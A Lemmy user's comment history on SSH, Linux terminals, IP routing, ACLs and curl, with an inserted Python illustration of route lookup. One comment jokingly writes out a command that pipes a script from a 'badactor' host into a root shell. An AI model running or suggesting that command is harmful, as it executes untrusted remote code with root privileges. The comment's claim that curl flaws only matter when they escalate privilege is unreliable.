PowerCrazy

joined 1 year ago
[–] PowerCrazy@lemmy.ml 2 points 1 month ago

Don't listen to this guy at all.

[–] PowerCrazy@lemmy.ml 25 points 5 months ago* (last edited 5 months ago)

Seems novel. But from a security aspect, if OpenSSH has a security vulnerability that allows an unauthenticated user to log in, via whatever means, once you are in the system as a non-privileged user, you are now free to use the same vulnerability to get root.

Basically this exercise is like using two locks that have the same key to open them. If the same key opens them, then a weakness in one is now a weakness in the other so why bother with two identical locks?

[–] PowerCrazy@lemmy.ml 8 points 6 months ago

hahaah. Ok sure you win. Linux TTY's are absolutely not terminals. Sure they are called terminals, they are for all intents and purposes modern-day terminals with a long and storied history that directly links them to terminals from the 70's but since they aren't a physical piece of hardware that electro-mechanically connects to a mainframe, obviously they aren't really terminals and they should be called something else.

[–] PowerCrazy@lemmy.ml 1 points 6 months ago (2 children)

Do you know what a terminal is?

[–] PowerCrazy@lemmy.ml 21 points 7 months ago (2 children)

When my calculator app in Windows is suspended, but has locked 29 threads and is using 60megs of ram. Not that those two values are significant, but why is my calculator-app "suspended" when I closed it a few days ago since the last time I used it? Shouldn't it just be closed and not showing up at all?

[–] PowerCrazy@lemmy.ml 18 points 8 months ago (1 children)

I'm not a software developer, but I absolutely do coding and one of the standard questions I ask is what OS they run on official company approved laptops. Other than a shitty bank I worked at for a few years (bad idea, but at least I got a pension out of it), all of them allow Windows, OSX, and at least one flavor of Linux. If they don't allow that stuff, you should just turn down the offer anyway.

[–] PowerCrazy@lemmy.ml 2 points 9 months ago* (last edited 9 months ago)

Layer3 decides where broadcasts stop (at the boundary between two networks, i.e. a router)

Layer2 is where broadcasts go.

[–] PowerCrazy@lemmy.ml 2 points 9 months ago* (last edited 9 months ago)

This isn't actually correct. An IP address assignment for a host with an IP requires both the address and the subnet mask. One cannot be assigned without the other. Even more strictly speaking the address by itself isn't useful to the network stack except as a destination, and isn't used anywhere in the network stack of the host. There is always a subnet mask, sometimes the mask is assumed to be /32 (255.255.255.255), sometimes /24, whatever. But whenever you are talking about assigning an IP address to any IP speaker, it must include the mask.

The routing table on every IP speaker will include at a minimum a single host-route. That is the IP of the system itself with a /32 mask and the configured interface of that IP. Whether it's eth0, a bonded interface, a loopback etc.

Once you have that single host route, additional routes can be added as needed. These routes require an address, a subnet, and a next-hop. The next hop can be a directly attached interface, or an IP that is reachable by another route in the host routing table.

If you have only a host route, as OP has, then the system has no network knowledge, so there are no reachable next hop IPs. So you would have to use a directly connected interface, like the OP did. Once you tell the system 192.168.0.0/24 is reachable through that interface, then any IP Packets that have that network as their destination will use that interface with a source of the one IP it has. In the case of two servers connected back to back, assuming the other server knows where the source of the packet came from, there is no problem sending traffic back.

So to answer the OPs question, there is no difference between one host route, then a static route pointing to an interface, and just a directly connected interface with your server IP on it. They are two different routes that may have different administrative distances, but assuming you aren't doing anything exotic, for all intents and purposes they are the same.

If you are talking about layer2 concepts like broadcasts, the host-route configured server can still receive broadcasts, but only broadcasts with destination IP of 255.255.255.255, not scoped broadcasts like 192.168.0.255 since it will ignore all traffic that isn't unscoped broadcast or a full match to its own IP address.
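
A simplified model of the route selection described in the comment above, added here as an illustration (it is not the commenter's code and not how any kernel implements routing). The `RouteTable` class and the addresses 192.168.0.1, 192.168.0.2 and 10.0.0.0/8 are constructed for the example.

```python
import ipaddress


class RouteTable:
    """Toy longest-prefix-match table for one host (illustrative model only)."""

    def __init__(self, address, dev):
        # Address assigned with a /32 mask: the table starts with one host route.
        self.routes = [(ipaddress.ip_network(f"{address}/32"), dev, None)]

    def lookup(self, dst):
        """Return (prefix, interface, next_hop) of the most specific match, or None."""
        addr = ipaddress.ip_address(dst)
        matches = [r for r in self.routes if addr in r[0]]
        if not matches:
            return None  # no route: the destination is unreachable
        net, dev, via = max(matches, key=lambda r: r[0].prefixlen)
        return (str(net), dev, via)

    def add(self, prefix, dev=None, via=None):
        """Add a route through an interface, or through a next hop that already resolves."""
        net = ipaddress.ip_network(prefix)
        if via is not None:
            hop = self.lookup(via)
            if hop is None:
                raise ValueError(f"next hop {via} is not reachable by any existing route")
            dev = hop[1]  # traffic leaves on the interface that reaches the next hop
        elif dev is None:
            raise ValueError("a route needs an interface or a next hop")
        self.routes.append((net, dev, via))


def demo():
    table = RouteTable("192.168.0.1", "eth0")
    out = {"host_only": table.lookup("192.168.0.2")}
    try:
        table.add("10.0.0.0/8", via="192.168.0.2")
        out["gateway_before_subnet"] = "accepted"
    except ValueError:
        out["gateway_before_subnet"] = "rejected"
    table.add("192.168.0.0/24", dev="eth0")     # static route pointing at the interface
    out["peer"] = table.lookup("192.168.0.2")
    table.add("10.0.0.0/8", via="192.168.0.2")  # next hop now resolves via the /24
    out["remote"] = table.lookup("10.1.2.3")
    out["self"] = table.lookup("192.168.0.1")   # the /32 still wins for the host's own IP
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```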

[–] PowerCrazy@lemmy.ml 1 points 1 year ago

The only thing you need to know about file acls is not to use them. Similar thing can be said for Network ACLs to be honest.

[–] PowerCrazy@lemmy.ml -2 points 1 year ago

I'll admit I'm out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the "libcurl" library that is much more serious and severe than just saying "curl" is vulnerable.

I'm assuming that libcurl touches a huge amount of the Linux network stack.

[–] PowerCrazy@lemmy.ml -2 points 1 year ago (2 children)

I don't see how a vulnerability in Curl can exist at all unless it's privilege escalation (you don't run curl as root do you?) And if it's not a privilege escalation, then it sounds like it's just a "root user can do things that you can do as root, possibly unintended" which isn't a vulnerability at all.

sudo curl www.badactor.ru/hackme | bash !!!!

[–] PowerCrazy@lemmy.ml -2 points 1 year ago

Get two of them and a stack cable and you can have a 96 port switch.
